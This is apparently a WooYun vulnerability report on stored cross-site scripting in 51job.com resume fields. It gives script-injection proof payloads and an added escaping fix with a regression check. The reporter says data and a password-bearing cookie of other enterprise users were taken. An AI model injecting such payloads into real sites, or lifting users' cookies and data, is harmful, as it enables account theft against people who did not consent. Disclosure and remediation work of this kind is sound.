Brief description: Multiple stored XSS issues in 51job.com resumes, which make it possible to obtain some information about enterprise users. Applying for an enterprise user account requires verification, so no tests were conducted from one.
However, some information about other enterprise users was obtained.
Description: inserted.
Proof of vulnerability:
<td id="Cur_Val" valign="top"><script>alert("Cross-Site self-evaluation")</script></td>
<td id="Cur_Val" colspan="2" valign="top"><script>alert("work description cross-site")</script></td>
<td width="84%" id="Cur_Val" valign="top"><script>alert("project description cross-site")</script></td>
<td id="Cur_Val" valign="top"><script>alert("Cross-Site responsibility description")</script></td>
<td id="Cur_Val" colspan="4" valign="top" height="30"><script>alert("professional description cross-site")</script></td>
<td width="86%" id="Cur_Val"><script>alert("cross-site content")</script></td>
None of these fields are filtered at all. The script runs as long as you insert it.
Here is a little of what was stolen ..
I'm not sure why I can't steal other information.
The previous day's cookie contained a password.
Now it's gone.
Solution: Filter and escape.
Author Tea @ wooyun
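
The "filter and escape" fix applied to the Cur_Val cells shown in the proof, as an added example that is not 51job.com code or part of the original report. The function names, the field labels and the sample resume are assumptions constructed for illustration.

```javascript
// Added example: constructed names and sample data, not the site's own code.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every character that can change the HTML parsing context.
function escapeHtml(value) {
  return String(value ?? "").replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Before: the stored field is concatenated into the cell as markup,
// which is the behaviour the proof above shows.
function renderCellUnsafe(value) {
  return '<td id="Cur_Val" valign="top">' + value + "</td>";
}

// After: the stored field is encoded at output time, so it renders as text.
function renderCellSafe(value) {
  return '<td id="Cur_Val" valign="top">' + escapeHtml(value) + "</td>";
}

// Render a whole resume; every free-text field goes through the same encoder.
function renderResume(resume) {
  return Object.entries(resume)
    .map(([label, value]) => "<tr><th>" + escapeHtml(label) + "</th>" + renderCellSafe(value) + "</tr>")
    .join("\n");
}

// Regression check: true if any <td> body still contains a raw tag.
function hasRawMarkup(html) {
  const cells = html.match(/<td[^>]*>([\s\S]*?)<\/td>/g) || [];
  return cells.some((cell) => {
    const body = cell.replace(/^<td[^>]*>/, "").replace(/<\/td>$/, "");
    return /<[a-z!\/]/i.test(body);
  });
}

// Constructed sample: one field carries the payload from the proof,
// one carries ordinary text that happens to contain special characters.
const sampleResume = {
  "Self-evaluation": '<script>alert("Cross-Site self-evaluation")</script>',
  "Work description": "Maintained billing services & on-call <rotations>",
};

console.log(renderCellUnsafe(sampleResume["Self-evaluation"]));
console.log(renderResume(sampleResume));
console.log("raw markup in safe output:", hasRawMarkup(renderResume(sampleResume)));
```

Encoding at output time keeps the stored text intact, so a legitimate "<" or "&" in a work description still displays correctly. The hasRawMarkup check can run in a test suite against every template that renders resume fields.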